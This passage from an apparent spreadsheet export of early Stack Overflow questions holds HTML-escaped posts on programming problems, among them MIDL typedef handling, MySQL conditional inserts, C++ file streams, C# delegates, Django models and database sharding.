&lt;pre&gt;&lt;code&gt;//this is test.idl
typedef foo foo_t;
// end of test.idl
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;When I compile test.idl with the following command:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;midl /W4 test.idl
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I get this output&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Microsoft (R) 32b/64b MIDL Compiler Version 6.00.0366
Copyright (c) Microsoft Corporation 1991-2002. All rights reserved.
Processing .\test.idl
test.idl
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and I get a wrong test.h (at the bottom of this message) which has
only&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;typedef foo_t;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;where the unknown foo type was silently discarded.&lt;/p&gt;
&lt;p&gt;I would have expected an error message stating "foo is an unknown
type", am I wrong?&lt;/p&gt;
&lt;p&gt;Do I need to pass any particular arguments to the MIDL command?&lt;/p&gt;
&lt;p&gt;I got the same result with MIDL compiler version 7.00.0500&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;/* this ALWAYS GENERATED file contains the definitions for the
interfaces */
 /* File created by MIDL compiler version 6.00.0366 */
/* at Thu Nov 13 11:47:40 2008
 */
/* Compiler settings for test.idl:
    Oicf, W4, Zp8, env=Win32 (32b run)
    protocol : dce , ms_ext, c_ext, robust
    error checks: allocation ref bounds_check enum stub_data
    VC __declspec() decoration level:
         __declspec(uuid()), __declspec(selectany), __declspec
(novtable)
         DECLSPEC_UUID(), MIDL_INTERFACE()
*/
//@@MIDL_FILE_HEADING(  )
#pragma warning( disable: 4049 )  /* more than 64k source lines */
/* verify that the &amp;lt;rpcndr.h&amp;gt; version is high enough to compile this
file*/
#ifndef __REQUIRED_RPCNDR_H_VERSION__
#define __REQUIRED_RPCNDR_H_VERSION__ 475
#endif
#include "rpc.h"
#include "rpcndr.h"
#ifndef __RPCNDR_H_VERSION__
#error this stub requires an updated version of &amp;lt;rpcndr.h&amp;gt;
#endif // __RPCNDR_H_VERSION__
#ifndef __test_h__
#define __test_h__
#if defined(_MSC_VER) &amp;amp;&amp;amp; (_MSC_VER &amp;gt;= 1020)
#pragma once
#endif
/* Forward Declarations */
#ifdef __cplusplus
extern "C"{
#endif
void * __RPC_USER MIDL_user_allocate(size_t);
void __RPC_USER MIDL_user_free( void * );
/* interface __MIDL_itf_test_0000 */
/* [local] */
typedef foo_t;
extern RPC_IF_HANDLE __MIDL_itf_test_0000_v0_0_c_ifspec;
extern RPC_IF_HANDLE __MIDL_itf_test_0000_v0_0_s_ifspec;
/* Additional Prototypes for ALL interfaces */
/* end of Additional Prototypes */
#ifdef __cplusplus
}
#endif
#endif
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>SQL - How to make a conditional INSERT</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Using &lt;strong&gt;only MySQL&lt;/strong&gt;, I'm seeing if it's possible run an insert statement ONLY if the table is new. I successfully created a user variable to see if the table exists. The problem is that you can't use "WHERE" along with an insert statement. Any ideas on how to get this working?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;// See if the "country" table exists -- saving the result to a variable
SELECT
    @table_exists := COUNT(*)
FROM
    information_schema.TABLES
WHERE
    TABLE_SCHEMA = DATABASE() AND TABLE_NAME = 'country';
// Create the table if it doesn't exist
CREATE TABLE IF NOT EXISTS country (
    id INT unsigned auto_increment primary key,
    name VARCHAR(64)
);
// Insert data into the table if @table_exists &amp;gt; 0
INSERT INTO country (name) VALUES ('Afghanistan'),('Aland Islands') WHERE 0 &amp;lt; @table_exists;
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Can I make a website full screen without flash or silverlight?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm working on something that needs a webpage to go full screen. The screen must become completely white. &lt;/p&gt;
&lt;p&gt;Is there anyway that I can do this without flash or silverlight? 
Thanks in advance&lt;/p&gt;
&lt;p&gt;edit: Im not trying to force anybody into fullscreen, this will be mainly used by a couple of people. Even so I'll give proper feedback on how to get in and out of fullscreen .&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C++ reading from a file blocks any further writing. Why?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am implementing a very simple file database. I have 2 basic operations: &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;void Insert(const std::string &amp;amp; i_record)
{
   //create or append to the file
    m_fileStream.open(m_fileName.c_str(), std::ios::out | std::ios::app);
    if (m_fileStream.is_open())
    {
        m_fileStream &amp;lt;&amp;lt; i_record &amp;lt;&amp;lt; "\n";
    }
    m_fileStream.flush();
    m_fileStream.close();
}
/*
* Returns a list with all the items in the file.
*/
 std::vector&amp;lt;std::string&amp;gt; SelectAll()
 {
    std::vector&amp;lt;std::string&amp;gt; results;
    m_fileStream.open(m_fileName.c_str(), std::ios::in);
    std::string line;
    if (m_fileStream.is_open())
    {
        while (!m_fileStream.eof())
        {
            getline (m_fileStream, line);
            results.push_back(line);
        }
    }
    m_fileStream.close();
    return results;
 }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;the class has m_fileStream and m_fileName as private members. &lt;/p&gt;
&lt;p&gt;OK - here's the problem: &lt;/p&gt;
&lt;p&gt;If I do something like: &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;db-&amp;gt;Insert("a");
db-&amp;gt;SelectAll();
db-&amp;gt;Insert("b");
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The end result is that the file will contain &lt;em&gt;only&lt;/em&gt; "a"; WHY? &lt;/p&gt;
&lt;p&gt;NOTE: it seems that getline() will set the fail bit. but why?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Silverlight DataBinding Error - Works in WPF Though!</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Start a new Silverlight application... and in the code behind (in the "Loaded" event), put this code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;// This will *NOT* cause an error.
this.LayoutRoot.DataContext = new string[5];
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But...&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;// This *WILL* cause an error!
this.LayoutRoot.DataContext = this;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The error that is raised is "Value does not fall within the expected range." BTW, this code works 100% in regular WPF (Windows development), and there should be no reason why it won't work in WPF/E :)&lt;/p&gt;
&lt;p&gt;Any thoughts?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to correctly unregister an event handler</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In a code review, I stumbled over this (simplified) code fragment to unregister an event handler:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt; Fire -= new MyDelegate(OnFire);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I thought that this does not unregister the event handler because it creates a new delegate which had never been registered before. But searching MSDN I found several code samples which use this idiom.&lt;/p&gt;
&lt;p&gt;So I started an experiment:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;internal class Program
{
    public delegate void MyDelegate(string msg);
    public static event MyDelegate Fire;
    private static void Main(string[] args)
    {
        Fire += new MyDelegate(OnFire);
        Fire += new MyDelegate(OnFire);
        Fire("Hello 1");
        Fire -= new MyDelegate(OnFire);
        Fire("Hello 2");
        Fire -= new MyDelegate(OnFire);
        Fire("Hello 3");
    }
    private static void OnFire(string msg)
    {
        Console.WriteLine("OnFire: {0}", msg);
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;To my surprise, the following happened:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;code&gt;Fire("Hello 1");&lt;/code&gt; produced two messages, as expected.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;Fire("Hello 2");&lt;/code&gt; produced one message!&lt;br /&gt;
This convinced me that unregistering &lt;code&gt;new&lt;/code&gt; delegates works!&lt;/li&gt;
&lt;li&gt;&lt;code&gt;Fire("Hello 3");&lt;/code&gt; threw a &lt;code&gt;NullReferenceException&lt;/code&gt;.&lt;br /&gt;
 Debugging the code showed that &lt;code&gt;Fire&lt;/code&gt; is &lt;code&gt;null&lt;/code&gt; after unregistering the event.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;I know that for event handlers and delegate, the compiler generates a lot of code behind the scene. But I still don't understand why my reasoning is wrong.&lt;/p&gt;
&lt;p&gt;What am I missing?&lt;/p&gt;
&lt;p&gt;Additional question: from the fact that &lt;code&gt;Fire&lt;/code&gt; is &lt;code&gt;null&lt;/code&gt; when there are no events registered, I conclude that everywhere an event is fired, a check against &lt;code&gt;null&lt;/code&gt; is required.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How best can I isolate my application from an unreliable database?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a Java SOAP data service which sits on top of a Sybase database which, for reasons out of my control, has unreliable performance. The database is part of a vendor package which has been modified by an internal team and most of the issues are caused by slow response times at certain times of the day. &lt;/p&gt;
&lt;p&gt;The SOAP service provides data to a calculation grid and when I request data, I need the response time to be both fast and &lt;em&gt;consistent&lt;/em&gt;.  The service provides basic CRUD functionality, but the ratio of reads to writes is approximately 100:1.  &lt;/p&gt;
&lt;p&gt;What is the best strategy to isolate myself from the database's unreliable performance and ensure that the SOAP service is fast and reliable?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Spring Integration as embedded alternative to standalone ESB</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does anybody has an experience with &lt;a href="http://springframework.org/spring-integration" rel="nofollow"&gt;Spring Integration&lt;/a&gt; project as embedded ESB?&lt;/p&gt;
&lt;p&gt;I'm highly interesting in such use cases as:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Reading files from directory on schedule basis&lt;/li&gt;
&lt;li&gt;Getting data from JDBC data source&lt;/li&gt;
&lt;li&gt;Modularity and possibility to start/stop/redeploy module on the fly (e.g. one module can scan directory on schedule basis, another call query from jdbc  data source etc.)&lt;/li&gt;
&lt;li&gt;repeat/retry policy&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;UPDATE:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;I found answers on all my questions except "Getting data from JDBC data source". Is it technically possible?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Print Report without ReportViewer in ASP.NET</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am using Business Intelligent reporting servicess to reporting some data from My MS SQL Database. In ASP.NET I create new Reporting Viewer that take data from BI and display the report then I can Print it.&lt;/p&gt;
&lt;p&gt;My Question is How can I print the report without report viewer?&lt;/p&gt;
&lt;p&gt;thanks in advance :)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What constitutes a good memory profile?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In designing any desktop applications, are there any general rules on how much memory should the application uses?&lt;/p&gt;
&lt;p&gt;For heavy-weight applications, those can be easily understood or at least profiled such as Firefox or Google Chrome. But for smaller utilities or line-of-business application, how much is an acceptable amount of memory usage?&lt;/p&gt;
&lt;p&gt;I asked because I've recently come across a trade-off between memory usage and performance and wonder if there is any general consensus regarding it?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT:&lt;/strong&gt; Platform is Windows XP for users with machine just capable of running rich internet applications.&lt;/p&gt;
&lt;p&gt;My specific trade-off problem is about caching a lot of images in memory. If possible, I'd love to have my app cache as much as the user's memory will allow. I have done it so that the application will cache upto a certain maximum limit &lt;em&gt;considering memory pressure at the moment.&lt;/em&gt;.&lt;/p&gt;
&lt;p&gt;But what would be a good number? How do you come up with one? That's the point I'm asking.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Algorithm to determine how positive or negative a statement/text is</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need an algorithm to determine if a sentence, paragraph or article is negative or positive in tone... or better yet, how negative or positive.&lt;/p&gt;
&lt;p&gt;For instance:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;blockquote&gt;
    &lt;p&gt;Jason is the worst SO user I have ever witnessed (-10)&lt;/p&gt;
    &lt;p&gt;Jason is an SO user (0)&lt;/p&gt;
    &lt;p&gt;Jason is the best SO user I have ever seen (+10)&lt;/p&gt;
    &lt;p&gt;Jason is the best at sucking with SO (-10)&lt;/p&gt;
    &lt;p&gt;While, okay at SO, Jason is the worst at doing bad (+10)&lt;/p&gt;
  &lt;/blockquote&gt;
&lt;/blockquote&gt;
&lt;p&gt;Not easy, huh? :)&lt;/p&gt;
&lt;p&gt;I don't expect somebody to explain this algorithm to me, but I assume there is already much work on something like this in academia somewhere. If you can point me to some articles or research, I would love it.&lt;/p&gt;
&lt;p&gt;Thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Function persistence in Common Lisp</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there any persistence solution for Common Lisp, such as Elephant, that allows function persistence? Currently my app stores an identifier on the db and later searches in a function table which it is, but this method does not allow dynamically created functions to be stored.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Positive lookahead for exclamation mark</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to build a Java regular expression to match "&lt;code&gt;.jar!&lt;/code&gt;"&lt;/p&gt;
&lt;p&gt;The catch is that I don't want the matcher to consume the exclamation mark. I tried using &lt;code&gt;Pattern.compile("\\.jar(?=!)")&lt;/code&gt; but that failed. As did escaping the exclamation mark.&lt;/p&gt;
&lt;p&gt;Can anyone get this to work or is this a JDK bug?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;UPDATE&lt;/strong&gt;: I feel like an idiot, &lt;code&gt;Pattern.compile("\\.jar(?=!)")&lt;/code&gt; does work. I was using Matcher.matches() instead of Matcher.find().&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How semantic is your XHTML/CSS markup?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I think I'm pretty good at using semantic markup on my pages but I still have a handful of classes like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;/**** Aligns ****/
.right_align  { text-align: right; }
.left_align   { text-align: left; }
.center_align { text-align: center; }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Which, technically, is a no-no. But when you just want to position some text in a table, how crazy am I supposed to get with the semantic markup?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Vb6: Need some help with a loop</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;So I have a loop that's supposed to do three things, go through a text file line by line, the text file contains pathnames and filenames(C:\Folder\file1.txt)
If the line contains a certain string, it then copies a file to that location, renames it to what it is named in the text file, and then replaces a string within the copied file(still with me?).  If not it goes on to the next line.  I thought this would be fairly straight forward but I doesn't seem to be working, I'm currently unable to even compile as I'm getting errors saying the loop's syntax is wrong.  Any help would be appreciated, here's the entire function's code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Private Sub Command2_Click()
Dim LineData As String 
Dim FileHandle As Integer
FileHandle = FreeFile
Open "C:\textfile.txt" For Input As #FileHandle
Do While Not EOF(FileHandle)
Line Input #FileHandle, LineData
If InStr(LineData, ".log") Then
FileCopy "C:\thefile.log",LineData
Open LineData For Input As #3
 #3 = Replace$(#3, "abc", "xyz")
Else
End If  
Loop
Close #FileHandle
Close #3
 MsgBox "Copy, Replace, Complete!"
End Sub
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Thanks in Advance!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Using application settings across assemblies</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm writing an application that includes a plugin system in a different assembly.&lt;/p&gt;
&lt;p&gt;The problem is that the plugin system needs to get application settings from the main app (like the directory to look for plugins).&lt;/p&gt;
&lt;p&gt;How is this done, or am I going about this the wrong way?&lt;/p&gt;
&lt;p&gt;Edit: I was encouraged to add some details about how the plugin system works. I haven't completely worked that out and I've only just begun implementing it, but I basically went by &lt;a href="http://divil.co.uk/net/articles/plugins/plugins.asp" rel="nofollow"&gt;this article&lt;/a&gt;.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>"Unknown column 'user_id' error in django view</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm having an error where I am not sure what caused it.&lt;/p&gt;
&lt;p&gt;Here is the error:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Exception Type:     OperationalError
Exception Value:    
(1054, "Unknown column 'user_id' in 'field list'")
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Does anyone know why I am getting this error? I can't figure it out. Everything seems to be fine. &lt;/p&gt;
&lt;p&gt;My view code is below:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;if "login" in request.session:
    t = request.POST.get('title', '')
    d = request.POST.get('description', '')
    fid = request.session["login"]
    fuser = User.objects.get(id=fid)
    i = Idea(user=fuser, title=t, description=d, num_votes=1)
    i.save()
    return HttpResponse("true", mimetype="text/plain")
else:
    return HttpResponse("false", mimetype="text/plain")
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I appreciate any help! Thanks!&lt;/p&gt;
&lt;p&gt;Edit: Also a side question. Do I use objects.get(id= or objects.get(pk= ?   If I use a primary key, do I need to declare an id field or an index in the model?&lt;/p&gt;
&lt;p&gt;Edit: Here are the relevant models:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class User (models.Model):
    first_name = models.CharField(max_length=200)
    last_name = models.CharField(max_length=200)
    email = models.CharField(max_length=200)
    password = models.CharField(max_length=200)
class Idea (models.Model):
    user = models.ForeignKey(User)
    title = models.CharField(max_length=200)
    description = models.CharField(max_length=255)
    num_votes = models.IntegerField()
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Why Isn't My C Code Being Compiled To An EXE</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm just starting out writing trying to write a simple program in C and I am using Visual Studios to do so. I heard that it does compile C as well as C++. And I know that it does because it says it compiles. The only problem is that when I go to the output directory, there isn't a .exe file in the directory! It has the following:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;BuildLog.html&lt;/li&gt;
&lt;li&gt;mt.dep&lt;/li&gt;
&lt;li&gt;test1.obj&lt;/li&gt;
&lt;li&gt;vc90.idb&lt;/li&gt;
&lt;li&gt;vc90.pdb&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;But that is all! No EXE. I've looked through all the options and made sure that it is set to compile to an exe and i checked the output file. That is $(OutDir)\$(ProjectName).exe. But alas, no exe appears. Any ideas?&lt;/p&gt;
&lt;p&gt;Also when i try to hit f5 and run with debut i get an error that says&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;This application has failed to start
  because MSVCR90.DLL was not found.
  Re-installing the application may fix
  this problem&lt;/p&gt;
&lt;/blockquote&gt;
</t>
  </si>
  <si>
    <t>How to deploy an RubyGem-based Server</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We have built a custom socket server in ruby and packaged it as a gem.  Since this is an internal project we can not simply publish it to RubyForge or GitHub.  I tried to setup our own gem server but gem would not authenticate over https. Our other deployment is all for standard rails applications that use capistrano and svn for deployment.&lt;/p&gt;
&lt;p&gt;Our current setup which is to use a rails-like deployment with capistrano. which does the following:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Check out the code from svn&lt;/li&gt;
&lt;li&gt;Build the gem&lt;/li&gt;
&lt;li&gt;Install the gem&lt;/li&gt;
&lt;li&gt;Restart the server&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;This just seems awkward, and makes the gem packaging seem like extra work -- but outside of the deployment issue it fits really nicely as a gem.&lt;/p&gt;
&lt;p&gt;Is there a cleaner approach?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can I use CSS in directory listing of Firefox?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;For example if I put "C:\docs" in address bar of Firefox, it shows all files in the directory. Is it possible to customize this page with CSS?&lt;/p&gt;
&lt;p&gt;Apache 2.2 allows us to do it using IndexStyleSheet directive, so I wondered if Firefox can do it.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Dynamically include .js files from Zend_Controller_Action?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I came across the case where depending on the execution path I may need to invoke an inclusion of .js file from controller. Is there a nice way of doing it? (besides setting some view variable with actual .js include code)?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>If I'm posting a question about Oracle SQL query performance, what should I include in my question?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;If I am posting a question about a query against an Oracle database, what should I include in my question so that people have a chance to answer me?  How should I get this information?&lt;/p&gt;
&lt;p&gt;Simply providing the poorly performing query may not be enough.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>jQuery two sliders controlling each other</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;This is in reference to the &lt;a href="http://stackoverflow.com/questions/282944/jquery-one-slider-controls-another"&gt;question&lt;/a&gt; previously asked
The problem here is, each slider controls the other. It results in feedback. How do I possibly stop it?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$(function() {
	$("#slider").slider({ slide: moveSlider2 });
	$("#slider1").slider({ slide: moveSlider1 });
	function moveSlider2( e, ui ) 
	{
		$('#slider1').slider( 'moveTo', Math.round(ui.value) );
	}
	function moveSlider1( e, ui ) 
	{
		$('#slider').slider( 'moveTo', Math.round(ui.value) );
	}
});
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>In C#, how do I save a webpage to file without destroying whatever the encoding is?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Here's what I got so far (that doesn't work). At this point I thought my target was Ansi encoded, but I really don't want to have to know at this point. My browser seems to be able to determine what encoding to use, How can I?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;static void GetUrl(Uri uri, string localFileName)
{
    HttpWebRequest request = (HttpWebRequest)WebRequest.Create(uri);
    HttpWebResponse response;
    response = (HttpWebResponse)request.GetResponse();
    // Save the stream to file
    Stream responseStream = response.GetResponseStream();
    StreamReader reader = new StreamReader(responseStream, Encoding.Default);
    Stream fileStream = File.OpenWrite(localFileName);
    using (StreamWriter sw = new StreamWriter(fileStream, Encoding.Default))
    {
        sw.Write(reader.ReadToEnd());
        sw.Flush();
        sw.Close();
     }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;After answers&lt;/strong&gt; (currently only tested on a UTF-8 site):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;static void GetUrl(Uri uri, string localFileName)
{
    HttpWebRequest request = (HttpWebRequest)WebRequest.Create(uri);
    HttpWebResponse response = (HttpWebResponse)request.GetResponse();
    try
    {
        // Hope GetEncoding() knows how to parse the CharacterSet
        Encoding encoding = Encoding.GetEncoding(response.CharacterSet);
        StreamReader reader = new StreamReader(response.GetResponseStream(), encoding);
        using (StreamWriter sw = new StreamWriter(localFileName, false, encoding))
        {
            sw.Write(reader.ReadToEnd());
            sw.Flush();
            sw.Close();
        }
    }
    finally
    {
        response.Close();
    }
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Free space in a CMD shell</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a way to get the amount of free diskspace of a disk or a folder in a CMD
without having to install some thirdparty applications?&lt;/p&gt;
&lt;p&gt;I have a CMD that copies a big file to a given directory and could of course use
the errorlevel return from the copy command, but then I have to wait for the time
it takes to copy the file (eg...to that then the disk is full and the copy operation fails).&lt;/p&gt;
&lt;p&gt;I would like to know before I start the copy if it is any idea at all. Tried the DU.EXE utility from Sysinternals, but that show occupied space only.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to use Castle Windsor with ASP.Net web forms?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to wire up dependency injection with Windsor to standard asp.net web forms. I think I have achieved this using a HttpModule and a CustomAttribute (code shown below), although the solution seems a little clunky and was wondering if there is a better supported solution out of the box with Windsor?&lt;/p&gt;
&lt;p&gt;There are several files all shown together here&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    // index.aspx.cs
    public partial class IndexPage : System.Web.UI.Page
    {
        protected void Page_Load(object sender, EventArgs e)
        {
            Logger.Write("page loading");
        }
        [Inject]
        public ILogger Logger { get; set; }
    }
    // WindsorHttpModule.cs
    public class WindsorHttpModule : IHttpModule
    {
        private HttpApplication _application;
        private IoCProvider _iocProvider;
        public void Init(HttpApplication context)
        {
            _application = context;
            _iocProvider = context as IoCProvider;
            if(_iocProvider == null)
            {
                throw new InvalidOperationException("Application must implement IoCProvider");
            }
            _application.PreRequestHandlerExecute += InitiateWindsor;
        }
        private void InitiateWindsor(object sender, System.EventArgs e)
        {
            Page currentPage = _application.Context.CurrentHandler as Page;
            if(currentPage != null)
            {
                InjectPropertiesOn(currentPage);
                currentPage.InitComplete += delegate { InjectUserControls(currentPage); };
            }
        }
        private void InjectUserControls(Control parent)
        {
            if(parent.Controls != null)
            {
                foreach (Control control in parent.Controls)
                {
                    if(control is UserControl)
                    {
                        InjectPropertiesOn(control);
                    }
                    InjectUserControls(control);
                }
            }
        }
        private void InjectPropertiesOn(object currentPage)
        {
            PropertyInfo[] properties = currentPage.GetType().GetProperties();
            foreach(PropertyInfo property in properties)
            {
                object[] attributes = property.GetCustomAttributes(typeof (InjectAttribute), false);
                if(attributes != null &amp;amp;&amp;amp; attributes.Length &amp;gt; 0)
                {
                    object valueToInject = _iocProvider.Container.Resolve(property.PropertyType);
                    property.SetValue(currentPage, valueToInject, null);
                }
            }
        }
    }
    // Global.asax.cs
    public class Global : System.Web.HttpApplication, IoCProvider
    {
        private IWindsorContainer _container;
        public override void Init()
        {
            base.Init();
            InitializeIoC();
        }
        private void InitializeIoC()
        {
            _container = new WindsorContainer();
            _container.AddComponent&amp;lt;ILogger, Logger&amp;gt;();
        }
        public IWindsorContainer Container
        {
            get { return _container; }
        }
    }
    public interface IoCProvider
    {
        IWindsorContainer Container { get; }
    }
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>What is the difference between CIL and MSIL (IL)?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Are these two terms interchangeable?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a fast way to transfer all the variables of one identical object into another in C#?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;This is probably a simple question.  Suppose I have a object called Users and it contains a lot of protected variables. &lt;/p&gt;
&lt;p&gt;Inside that Users class I have a method that creates a temporary Users object, does something with it, and if successful, transfers all the variables from the temp Users object into the one I have.  &lt;/p&gt;
&lt;p&gt;Is there some fast way to transfer all the variables from one Users object into another Users object without doing this using C#?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;this.FirstName = temp.FirstName;
this.LastName = temp.LastName;
........75 variables later......
this.FavoriteColor = temp.FavoriteColor
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>How can I automate (script) creating a war file in eclipse?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;It's 5 button clicks to get eclipse to create a deployable war file for my eclipse project, I figure there's probably some eclipse command line option to do the same thing, so I can just write it into a script, but I'm not seeing it.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to expand 'select' option width after the user wants to select an option</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Maybe this is an easy question, maybe not.  I have a select box where I hardcode with width. Say 120px.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;select style="width: 120px"&amp;gt;
  &amp;lt;option&amp;gt;ABC&amp;lt;/option&amp;gt;
  &amp;lt;option&amp;gt;REALLY LONG TEXT, REALLY LONG TEXT, REALLY LONG TEXT&amp;lt;/option&amp;gt;
&amp;lt;/select&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I want to be able to show the second option so that the user can see the full length of the text.&lt;/p&gt;
&lt;p&gt;Like everything else.  This works fine in Firefox, but doesn't work with Internet Explorer6.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>dllimport failed to locate dll even though it is in the PATH</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I use [Dllimport("DllName.dll")]
where I'm sure a path to my dll exists in the process PATH environment variable, and still
I get "DllName.dll could not be found"&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Best way to move a data row to another shard?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The question says it all. &lt;/p&gt;
&lt;p&gt;Example: I'm planning to shard a database table. The table contains customer orders which are flagged as "active", "done" and "deleted". I also have three shards, one for each flag.&lt;/p&gt;
&lt;p&gt;As far as I understand a row has to be moved to the right shard, when the flag is changed. &lt;/p&gt;
&lt;p&gt;Am I right?
What's the best way to do this?
Can triggers be used?&lt;/p&gt;
&lt;p&gt;I thought about not moving the row immediately, but only at the end of the day/week/month, but then it is not determined, in which shard a rows with a specific flag resides and searches have to be done always over all shards.&lt;/p&gt;
&lt;p&gt;EDIT: Some clarification:&lt;/p&gt;
&lt;p&gt;In general I have to choose on a criterum to decide, in which shard a row resides. In this case I want it to be the flag described above, because it's the most natural way to shard this kind of data. (In my opinion) There is only a limited number of active orders which is accessed very often. There is a large number of finished orders, which are seldom accessed and there's a very huge number of data rows which are almost never accessed.&lt;/p&gt;
&lt;p&gt;If I want to now where a specific data row resides I dont have to search all shards. If the user wants to load an active order, I know already in which database I have to look.&lt;/p&gt;
